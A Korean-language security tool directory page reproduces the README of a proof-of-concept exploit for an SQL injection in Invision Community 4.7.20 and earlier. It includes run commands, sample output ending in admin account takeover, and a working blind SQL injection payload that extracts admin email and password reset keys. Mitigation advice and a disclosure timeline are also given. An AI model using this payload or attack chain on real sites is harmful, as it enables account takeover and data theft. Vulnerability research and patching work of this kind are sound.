Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-48932---exploit — 개념 증명 익스플로잇 for CVE-2025-48932, Invision Community <= 4.7.20의 SQL 인젝션. 블라인드 SQLi를 통해 관리자 자격 증명 및 계정 탈취를 위한 비밀번호 재설정 키를 추출합니다. | Kitploit
도구/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

개념 증명 익스플로잇 for CVE-2025-48932, Invision Community <= 4.7.20의 SQL 인젝션. 블라인드 SQLi를 통해 관리자 자격 증명 및 계정 탈취를 위한 비밀번호 재설정 키를 추출합니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
29개월 전아직 검토되지 않음

Invision Community SQL Injection Exploit (CVE-2025-48932)

Python Version License CVE

Invision Community <= 4.7.20 버전에서 발견된 SQL 인젝션 취약점을 시연하는 개념 증명 익스플로잇입니다.

⚠️ 면책 조항

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.

  • 승인되지 않은 컴퓨터 시스템 접근은 불법입니다.
  • 이 도구는 소유하고 있거나 명시적 서면 허가를 받은 시스템에서만 사용하십시오.
  • 작성자는 이 도구의 오용이나 피해에 대해 책임을 지지 않습니다.
  • 이 도구는 보안 연구자, 침투 테스터 및 교육 목적으로만 제공됩니다.

📋 목차

  • 취약점 설명
  • 요구 사항
  • 설치
  • 사용법
  • 작동 원리
  • 완화 조치
  • 크레딧
  • 참고 자료

🔍 취약점 설명

CVE ID: CVE-2025-48932
심각도: 높음
CVSS 점수: 추후 공개
영향받는 버전: 4.7.21 이전의 Invision Community 4.x 버전

취약점은 /applications/calendar/modules/front/calendar/view.php 스크립트에 존재합니다. IPS\calendar\modules\front\calendar\view::search() 메서드의 location 요청 매개변수를 통해 전달된 사용자 입력이 SQL 쿼리에 사용되기 전에 적절히 필터링되지 않습니다.

이로 인해 원격 인증되지 않은 공격자는 다음을 수행할 수 있습니다:

  • 데이터베이스에서 민감한 데이터 추출
  • 관리자 자격 증명 읽기
  • 잠재적으로 관리자 계정 탈취 달성

익스플로잇을 위한 전제 조건:

  • 캘린더 애플리케이션이 설치되어 있어야 함
  • GeoLocation 기능(예: Google Maps)이 구성되어 있어야 함

참고: Invision Community 4.x 버전 < 4.7.18의 SQL 인젝션 취약점은 관리자 비밀번호를 재설정하여 관리자 계정 탈취 및 원격 코드 실행(RCE)으로 이어질 수 있었지만, 4.7.18 버전에서 비밀번호 재설정 메커니즘에 새로운 보안 암호화 키가 도입되어 이 공격 경로가 더 어려워졌습니다.

📦 요구 사항

  • Python 3.7 이상
  • pip (Python 패키지 관리자)
  • 인터넷 연결
  • Invision Community <= 4.7.20을 실행 중인 대상 시스템:
    • 캘린더 애플리케이션 설치
    • GeoLocation 기능 구성

🚀 설치

  1. 리포지토리 클론:

    root@kitploit:~
    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. 의존성 설치:

    root@kitploit:~
    pip install -r requirements.txt
    

💻 사용법

기본 사용법

root@kitploit:~
python invision-sqli-exploit.py -u http://target.com/forum/

상세 모드 (디버깅용)

root@kitploit:~
python invision-sqli-exploit.py -u https://example.com/community/ -v

명령줄 인수

예제 출력

root@kitploit:~
==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Target: http://example.com/forum/
==================================================

[*] Fetching CSRF token...
[+] CSRF token found: abc123def456...
[*] Step 1: Extracting admin email address...
[*] Extracting data: [email protected]
[+] Admin email: [email protected]

[!] Step 2: Manual action required!

Please follow these steps:
1. Navigate to: http://example.com/forum/index.php?/lostpassword/
2. Request a password reset using email: [email protected]
3. Press ENTER when done...

[*] Step 3: Extracting password reset validation key...
[*] Extracting data: xyz789abc123...
[+] Reset key: xyz789abc123...
[*] Step 4: Resetting admin password...

==================================================
[+] EXPLOITATION SUCCESSFUL!
==================================================

Admin credentials:
  Email:    [email protected]
  Password: Pwned1721234567

You can now login at: http://example.com/forum/index.php?/login/

🔬 작동 원리

익스플로잇은 네 가지 주요 단계로 작동합니다:

1. CSRF 토큰 추출

스크립트는 먼저 대상 웹사이트에서 CSRF 토큰을 가져옵니다. 이 토큰은 후속 요청에 필요합니다.

2. 부울 기반 블라인드 SQL 인젝션

이진 검색 알고리즘을 사용하여 데이터베이스에서 문자 단위로 데이터를 추출합니다:

  • 조건부 SQL 쿼리를 사용하여 각 문자를 테스트
  • RLIKE 함수와 정규식 패턴을 사용하여 참/거짓 조건 감지
  • 오류 메시지는 성공적인 조건을 나타냄

3. 관리자 이메일 추출

core_members 테이블을 조회하여 관리자의 이메일 주소를 추출합니다.

4. 비밀번호 재설정 익스플로잇

  • 공격자가 수동으로 관리자 계정에 대한 비밀번호 재설정을 시작
  • 익스플로잇이 데이터베이스에서 비밀번호 재설정 검증 키를 추출
  • 이메일 접근 없이 검증 키를 사용하여 관리자 비밀번호 재설정

기술적 세부 사항

인젝션 포인트:

root@kitploit:~
location parameter → calendar/view.php → search() method

페이로드 예시:

root@kitploit:~
'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

익스플로잇 기술: 효율적인 데이터 추출을 위해 이진 검색을 사용한 부울 기반 블라인드 SQL 인젝션.

🛡️ 완화 조치

사용자용

즉시 조치:

  1. 버전 4.7.21 이상으로 업그레이드 - 이 버전에서 취약점이 패치됨
  2. 사용하지 않는 경우 캘린더 애플리케이션 비활성화
  3. 액세스 로그 모니터링 - 의심스러운 활동 확인
  4. 관리자 계정 검토 - 승인되지 않은 접근 확인

개발자용

안전한 코딩 관행:

  1. 매개변수화된 쿼리/준비된 문 사용 - 사용자 입력을 SQL 쿼리에 직접 연결하지 마십시오
  2. 입력 검증 - 모든 사용자 입력을 검증하고 정제
  3. 최소 권한 원칙 - 데이터베이스 사용자에게 필요한 최소 권한만 부여
  4. 웹 애플리케이션 방화벽(WAF) - SQL 인젝션 시도를 탐지하는 WAF 규칙 배포
  5. 정기적인 보안 감사 - 정기적인 코드 검토 및 침투 테스트 수행

안전한 코드 예시:

root@kitploit:~
// 취약한 코드
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// 안전한 코드
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 공개 타임라인

날짜이벤트
2025년 5월 16일공급업체에 통보
2025년 5월 27일버전 4.7.21 출시
2025년 5월 28일CVE 식별자 요청
2025년 5월 28일CVE-2025-48932 할당

👏 크레딧

개발자:

  • nanda

참고: 이는 공개된 취약점 정보(CVE-2025-48932)를 기반으로 한 독립적인 구현입니다.

📚 참고 자료

  • CVE-2025-48932 세부 정보
  • Invision Community 공식 사이트
  • EDB-ID: 52383

📝 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.

🤝 기여

기여는 환영합니다! 자유롭게 Pull Request를 제출해 주십시오. 주요 변경 사항의 경우 먼저 이슈를 열어 변경하고자 하는 내용에 대해 논의해 주십시오.

⚖️ 법적 고지

이 도구는 MIT 라이선스에 따라 배포됩니다. 이 소프트웨어를 사용함으로써 다음 사항에 동의하게 됩니다:

  1. 법적이고 승인된 테스트 목적으로만 사용
  2. 자신의 행동에 대한 전적인 책임을 집니다
  3. 작성자를 오용이나 피해에 대해 책임을 묻지 않습니다
  4. 모든 관련 법률 및 규정을 준수합니다

기억하십시오: 대부분의 관할권에서 승인되지 않은 컴퓨터 시스템 접근은 범죄이며 심각한 법적 결과를 초래할 수 있습니다.


보안 취약점을 발견한 경우, 공개하기 전에 책임 있는 방식으로 공급업체에 공개하시기 바랍니다.

도구 다운로드
인수설명필수
-u, --url대상 Invision Community 기본 URL예
-v, --verbose디버깅을 위한 상세 출력 활성화아니요
-h, --help도움말 메시지 표시 및 종료아니요
2025년 7월 23일공개 공개